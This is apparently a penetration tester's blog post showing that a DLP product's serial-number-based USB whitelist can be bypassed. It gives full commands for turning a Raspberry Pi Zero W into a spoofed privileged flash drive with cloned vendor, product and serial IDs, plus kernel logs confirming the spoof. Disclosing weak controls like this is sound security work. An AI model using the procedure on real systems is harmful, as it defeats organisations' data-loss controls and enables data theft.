Why you shouldn’t trust USB whitelisting

A while back I was asked to evaluate a Data Loss Prevention (DLP) solution installed on a customer notebook. Next to a lot of poorly implemented controls that at least required an attacker to physically open the notebook and re-attach the hard disk, there was another easier “solution”.
Encryption was enforced on external drives, but with a few exceptions (for maintenance reasons, so I was told) based solely on the serial number. All you need to emulate one of those privileged USB thumb drives is:

For demonstration purpose I decided to clone all other parameters as well, instead of only the serial number.
Unfortunately this cloning also works for BYOD licenses that allow external drives for authentication.

Original USB flash drive

An old 512MB Alcor Micro Corp. flash drive

Bus 007 Device 014: ID 058f:6387 Alcor Micro Corp. Flash Drive
Device Descriptor:
  bLength                18
  bDescriptorType         1
  bcdUSB               2.00
  bDeviceClass            0 (Defined at Interface level)
  bDeviceSubClass         0
  bDeviceProtocol         0
  bMaxPacketSize0        64
  idVendor           0x058f Alcor Micro Corp.
  idProduct          0x6387 Flash Drive
  bcdDevice            1.02
  iManufacturer           1 Generic
  iProduct                2 Mass Storage
  iSerial                 3 363F6D44
  bNumConfigurations      1

Emulated USB flash drive

Using g_mass_storage module on a Raspberry PI Zero W

Bus 005 Device 004: ID 058f:6387 Alcor Micro Corp. Flash Drive
Device Descriptor:
  bLength                18
  bDescriptorType         1
  bcdUSB               2.00
  bDeviceClass            0 (Defined at Interface level)
  bDeviceSubClass         0
  bDeviceProtocol         0
  bMaxPacketSize0        64
  idVendor           0x058f Alcor Micro Corp.
  idProduct          0x6387 Flash Drive
  bcdDevice            1.02
  iManufacturer           3 Generic
  iProduct                4 Mass Storage
  iSerial                 5 363F6D44
  bNumConfigurations      1

Preparations

1. Download Raspbian Stretch Lite

Download the Raspbian Stretch Lite version from https://www.raspberrypi.org/downloads/raspbian/, verify and unzip:

dev@m3:~$ curl -LOJ https://downloads.raspberrypi.org/raspbian_lite_latest
% Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
Dload  Upload   Total   Spent    Left  Speed
100   390  100   390    0     0   1119      0 --:--:-- --:--:-- --:--:--  1117
100   399  100   399    0     0    992      0 --:--:-- --:--:-- --:--:--   992
100  349M  100  349M    0     0  2114k      0  0:02:49  0:02:49 --:--:-- 1382k
curl: Saved to filename '2018-06-27-raspbian-stretch-lite.zip'
dev@m3:~$ sha256sum 2018-06-27-raspbian-stretch-lite.zip
3271b244734286d99aeba8fa043b6634cad488d211583814a2018fc14fdca313 2018-06-27-raspbian-stretch-lite.zip
dev@m3:~$ unzip 2018-06-27-raspbian-stretch-lite.zip
Archive: 2018-06-27-raspbian-stretch-lite.zip
inflating: 2018-06-27-raspbian-stretch-lite.img

2. Write image to SD card

Write the raw image to your SD card (in our case /dev/sdb). This might take a while; use sudo kill -USR1 to print the current progress:

dev@m3:~$ sudo dd if=./2018-06-27-raspbian-stretch-lite.img of=/dev/sdb
3637248+0 records in
3637248+0 records out
1862270976 bytes (1.9 GB, 1.7 GiB) copied, 819.116 s, 2.3 MB/s

3. Mount boot image, enable host mode, enable SSH and configure WiFi

dev@m3:~$ mkdir boot root
dev@m3:~$ sudo mount /dev/sdb1 ./boot
dev@m3:~$ echo "dtoverlay=dwc2" >> boot/config.txt
dev@m3:~$ touch boot/ssh
dev@m3:~$ cat > boot/wpa_supplicant.conf
country=AT
ctrl_interface=DIR=/var/run/wpa_supplicant  ""GROUP=netdev
update_config=1
network={
	ssid="YOUR-SSID"
	psk="YOUR-SSID-PASSWORD"
	key_mgmt"" =WPA-PSK
}
dev@m3:~$ umount boot

4. Boot up your Raspberry with the SD Card, create a storage for the emulated flash drive and set the according parameters

dev@m3:~$ ssh pi@raspberrypi
pi@raspberrypi:~ $ dd bs=1M if=/dev/zero of=/home/pi/piusb.bin count=512
pi@raspberrypi:~ $ sudo modprobe g_mass_storage file=/home/pi/piusb.bin stall=0 ro=0 idVendor=1423 idProduct=25479 iSerialNumber=363F6D44 iManufacturer=Generic iProduct=Mass\ Storage bcdDevice=0x102

5. Connect the USB port of your Raspberry to your host

Sep 15 16:48:27 m3 kernel: [214679.656289] usb 5-1: new high-speed USB device number 4 using xhci_hcd
Sep 15 16:48:28 m3 kernel: [214679.799618] usb 5-1: New USB device found, idVendor=058f, idProduct=6387
Sep 15 16:48:28 m3 kernel: [214679.799623] usb 5-1: New USB device strings: Mfr=3, Product=4, SerialNumber=5
Sep 15 16:48:28 m3 kernel: [214679.799626] usb 5-1: Product: Mass Storage
Sep 15 16:48:28 m3 kernel: [214679.799629] usb 5-1: Manufacturer: Generic
Sep 15 16:48:28 m3 kernel: [214679.799632] usb 5-1: SerialNumber: 363F6D44
Sep 15 16:48:28 m3 kernel: [214679.800940] usb-storage 5-1:1.0: USB Mass Storage device detected
Sep 15 16:48:28 m3 kernel: [214679.801269] scsi host8: usb-storage 5-1:1.0
Sep 15 16:48:28 m3 mtp-probe: checking bus 5, device 4: "/sys/devices/pci0000:00/0000:00:15.1/0000:06:00.0/usb5/5-1"
Sep 15 16:48:28 m3 mtp-probe: bus: 5, device: 4 was not an MTP device
Sep 15 16:48:29 m3 kernel: [214680.805482] scsi 8:0:0:0: Direct-Access     Linux    File-Stor Gadget 0414 PQ: 0 ANSI: 2
Sep 15 16:48:29 m3 kernel: [214680.806165] sd 8:0:0:0: Attached scsi generic sg1 type 0
Sep 15 16:48:29 m3 kernel: [214680.806578] sd 8:0:0:0: [sdb] 1048576 512-byte logical blocks: (537 MB/512 MiB)
Sep 15 16:48:29 m3 kernel: [214680.806744] sd 8:0:0:0: [sdb] Write Protect is off
Sep 15 16:48:29 m3 kernel: [214680.806907] sd 8:0:0:0: [sdb] Write cache: enabled, read cache: enabled, doesn't support DPO or FUA
Sep 15 16:48:29 m3 kernel: [214680.809743] sd 8:0:0:0: [sdb] Attached SCSI disk

6. Automation

Add the modprobe line to /etc/rc.local to automatically start each time you connect your Raspberry. Congratulations, you just cloned yourself a flash drive
… or many more if you have a just copy the SD card and power up another Raspberry.

You may also like...

Leave a Reply

Recent Comments